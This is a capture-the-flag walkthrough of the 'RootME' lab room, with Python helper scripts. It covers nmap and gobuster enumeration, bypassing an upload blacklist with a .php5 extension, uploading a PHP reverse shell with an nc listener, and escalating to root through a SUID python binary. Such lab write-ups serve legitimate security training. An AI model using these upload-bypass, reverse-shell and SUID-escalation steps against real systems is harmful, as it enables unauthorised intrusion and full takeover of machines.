RootME


Last updated 3 years ago


A ctf for beginners, can you root me?

Questions

  • Scan the machine, how many ports are open?

  • What version of Apache is running?

  • What is the hidden directory?

  • user.txt?

  • Search for files with SUID permission, which file is weird?

  • root.txt?

Enumeration

Nmap

nmap -sSVC -A -O -vv <target>

(-sS SYN scan, -sV version detection, -sC default NSE scripts; -A already implies -sV, -sC, -O and a traceroute, so -O is redundant here.)

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9irIQxn1jiKNjwLFTFBitstKOcP7gYt7HQsk6kyRQJjlkhHYuIaLTtt1adsWWUhAlMGl+97TsNK93DijTFrjzz4iv1Zwpt2hhSPQG0GibavCBf5GVPb6TitSskqpgGmFAcvyEFv6fLBS7jUzbG50PDgXHPNIn2WUoa2tLPSr23Di3QO9miVT3+TqdvMiphYaz0RUAD/QMLdXipATI5DydoXhtymG7Nb11sVmgZ00DPK+XJ7WB++ndNdzLW9525v4wzkr1vsfUo9rTMo6D6ZeUF8MngQQx5u4pA230IIXMXoRMaWoUgCB6GENFUhzNrUfryL02/EMt5pgfj8G7ojx5
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBERAcu0+Tsp5KwMXdhMWEbPcF5JrZzhDTVERXqFstm7WA/5+6JiNmLNSPrqTuMb2ZpJvtL9MPhhCEDu6KZ7q6rI=
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: HackIT - Home

Q: Scan the machine, how many ports are open?

A: 2

Q: What version of Apache is running?

A: 2.4.29

Q: What service is running on port 22?

A: ssh
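The three nmap questions above can be answered mechanically from the scan output. The following is an added example, not code from the original writeup: it parses nmap's normal output (the port table, skipping the `|`/`|_` NSE script lines) and pulls out the open ports, the Apache version and the service on a given port. The sample text is the port table copied from the scan above; the only assumption is nmap's default column layout (PORT STATE SERVICE [REASON] VERSION), which the parser uses to locate the VERSION column.

```python
"""Parse nmap normal output to answer: open port count, Apache version, service on 22.

Added example, not part of the original writeup. NMAP_OUTPUT is copied from the scan
above; the parser assumes nmap's default column layout and ignores NSE script lines.
"""
import re
from typing import Dict, List, Optional

NMAP_OUTPUT = """\
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HackIT - Home
"""

# A port row starts with "<port>/<proto>"; script output lines start with "|" and never match.
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)")


def parse_ports(text: str) -> List[Dict[str, str]]:
    """Return one dict per port row with port, proto, state, service and version."""
    lines = text.splitlines()
    header = next((ln for ln in lines if ln.startswith("PORT")), None)
    if header is None:
        raise ValueError("no PORT header in nmap output")
    # nmap aligns the table to its header, so VERSION starts at a fixed column
    # (-1 when the scan was run without -sV and there is no VERSION column).
    ver_col = header.find("VERSION")
    rows = []
    for ln in lines:
        m = PORT_RE.match(ln)
        if not m:
            continue
        row = m.groupdict()
        row["version"] = ln[ver_col:].strip() if ver_col != -1 and len(ln) > ver_col else ""
        rows.append(row)
    return rows


def open_ports(text: str) -> List[Dict[str, str]]:
    return [r for r in parse_ports(text) if r["state"] == "open"]


def apache_version(text: str) -> Optional[str]:
    """Version string from the first open port whose banner is Apache httpd."""
    for r in open_ports(text):
        m = re.search(r"Apache httpd (\d+(?:\.\d+)+)", r["version"])
        if m:
            return m.group(1)
    return None


def service_on(text: str, port: int, proto: str = "tcp") -> Optional[str]:
    for r in open_ports(text):
        if r["port"] == str(port) and r["proto"] == proto:
            return r["service"]
    return None


if __name__ == "__main__":
    print("open ports:", len(open_ports(NMAP_OUTPUT)))
    print("apache:", apache_version(NMAP_OUTPUT))
    print("port 22:", service_on(NMAP_OUTPUT, 22))
```

Because the VERSION offset is taken from the header line rather than hard-coded, the same function works on output with or without the REASON column that -vv adds.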

Finding directories/files

Directory brute-forcing with gobuster (the full command is listed at the end of this writeup) turns up a hidden directory.

(the IP is different because I continued this writeup on another day)

Q: What is the hidden directory?

A: /panel/

Checking /panel/, we find a file-upload form.

Let's try to upload a reverse shell (pentestmonkey's PHP reverse shell, fetched with the curl command listed at the end of this writeup; set $ip and $port in revs.php to your attacking machine and listener port before uploading).

Remember to start a listener on that port first:

nc -lvp PORT

Uploading revs.php is rejected with "PHP isn't permitted".

The filter is a blacklist on the .php extension, so let's try bypassing it with the ".php5" extension, which the server still hands to the PHP interpreter:

mv revs.php revs.php5

The upload is accepted.

To run it, click "veja" ("see") next to the uploaded file.

The listener receives the connection: we have a shell.
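The rename works because the upload check rejects one spelling of the extension while the web server executes several. As an added example (not the room's server code, which the writeup does not show), the block below puts a constructed approximation of such a blacklist next to an allowlist check and lists which `revs.*` names each one lets through. PHP_VARIANTS is an illustrative list of extensions that servers are often configured to pass to the PHP handler; which of them actually execute depends on the target's Apache/PHP configuration.

```python
"""Blacklist vs allowlist upload filters: why "revs.php5" got past "PHP isn't permitted".

Added example, not the room's code. naive_blacklist_allows() is a constructed guess at a
filter that produces the observed behaviour; PHP_VARIANTS is illustrative, not exhaustive.
"""
import os
from typing import Callable, Iterable, List

# Extensions frequently mapped to the PHP handler (assumption: depends on server config).
PHP_VARIANTS = [".php", ".php3", ".php4", ".php5", ".phtml", ".phar"]


def naive_blacklist_allows(filename: str) -> bool:
    """Blacklist filter: rejects only an exact '.php' suffix (case-insensitive)."""
    return not filename.lower().endswith(".php")


def hardened_allows(filename: str, allowed: Iterable[str] = ("jpg", "jpeg", "png", "gif")) -> bool:
    """Allowlist filter: exactly one extension, compared case-insensitively against a
    short list of image types. Dotfiles (.htaccess), embedded NUL bytes and double
    extensions such as 'revs.php.png' are all rejected. Server-side you would also
    store the file under a random name in a directory where PHP execution is disabled."""
    base = os.path.basename(filename)
    if "\x00" in base or base.startswith(".") or base.count(".") != 1:
        return False
    stem, ext = base.split(".")
    return bool(stem) and ext.lower() in {a.lower() for a in allowed}


def bypass_candidates(stem: str = "revs",
                      check: Callable[[str], bool] = naive_blacklist_allows) -> List[str]:
    """Names built from PHP_VARIANTS that the given filter accepts."""
    return [stem + ext for ext in PHP_VARIANTS if check(stem + ext)]


if __name__ == "__main__":
    print("blacklist lets through:", bypass_candidates())
    print("allowlist lets through:", bypass_candidates(check=hardened_allows))
```

The point to take away is that the allowlist result is empty for every PHP variant without the filter needing to know about any of them; a blacklist has to enumerate every spelling the server might execute and loses as soon as it misses one.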

To upgrade the raw reverse shell to a proper TTY (tab completion, Ctrl+C without killing the shell):

python -c 'import pty;pty.spawn("/bin/bash")'

Then press Ctrl+Z to background the shell, put the local terminal in raw mode and bring the shell back:

stty raw -echo; fg

export TERM=xterm

user.txt

Finding it:

find / -type f -name user.txt 2>/dev/null

Reading it:

cat /var/www/user.txt

root.txt / Privilege Escalation

To list files owned by root with the SUID bit set:

find / -type f -user root -perm -4000 2>/dev/null

The odd one out is the python binary: an interpreter should never be SUID root. When it runs, the effective UID is 0 but the real UID is still the low-privilege user, and bash would drop the effective UID back to the real one; calling os.setuid(0) first makes all UIDs root before the shell is spawned:

python -c "import os;os.setuid(0);os.system('/bin/bash')"

From the resulting root shell, read root.txt.
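Spotting the "weird" SUID file is easier when the find output is diffed against what a stock install is expected to have. The block below is an added example, not part of the original writeup: SAMPLE_FIND_OUTPUT is a constructed stand-in for what `find / -type f -user root -perm -4000` prints on an Ubuntu 18.04-style host (the room's real output is only in a screenshot), KNOWN_SUID is an illustrative baseline you would build from a clean reference system of the same release, and `escalation_command` produces the python one-liner used above, explaining in its docstring why setuid(0) is needed.

```python
"""Triage SUID-root binaries against a baseline and show the interpreter escalation.

Added example, not part of the original writeup. SAMPLE_FIND_OUTPUT is constructed;
KNOWN_SUID is an illustrative baseline, not an authoritative list.
"""
import os
from typing import Iterable, List, Optional

SAMPLE_FIND_OUTPUT = """\
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/python
/usr/bin/traceroute6.iputils
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/fusermount
"""

# Binaries that are SUID root by design on a stock install (assumption: illustrative only).
KNOWN_SUID = {
    "/usr/bin/newgrp", "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/chsh", "/usr/bin/traceroute6.iputils",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
    "/bin/mount", "/bin/umount", "/bin/su", "/bin/ping", "/bin/fusermount",
}


def triage_suid(find_output: str, baseline: Iterable[str] = KNOWN_SUID) -> List[str]:
    """Return SUID paths not in the baseline, sorted: look these up (e.g. GTFOBins) first."""
    known = set(baseline)
    paths = {ln.strip() for ln in find_output.splitlines() if ln.strip()}
    return sorted(p for p in paths if p not in known)


def escalation_command(binary: str) -> Optional[str]:
    """A SUID interpreter starts with euid 0 but ruid still the caller; bash would drop
    euid back to ruid, so the real uid is set to 0 before a shell is spawned.
    Only python is handled here; anything else returns None rather than a guess."""
    name = os.path.basename(binary)
    if name == "python" or name.startswith("python2") or name.startswith("python3"):
        return f'{binary} -c "import os;os.setuid(0);os.system(\'/bin/bash\')"'
    return None


if __name__ == "__main__":
    for candidate in triage_suid(SAMPLE_FIND_OUTPUT):
        print(candidate, "->", escalation_command(candidate))
```

On a real engagement the baseline matters more than the code: generate it from the same distribution release with `find` on a clean image, since a single unexpected entry like an interpreter, a text editor or a copy of bash is usually the whole privilege escalation.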

Commands used

Directory brute-force (this is what found the hidden /panel/ directory):

gobuster dir -u http://10.10.63.255:80/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 33 -x html,php,txt

Fetching the shell (pentestmonkey's PHP reverse shell):

curl -o revs.php https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php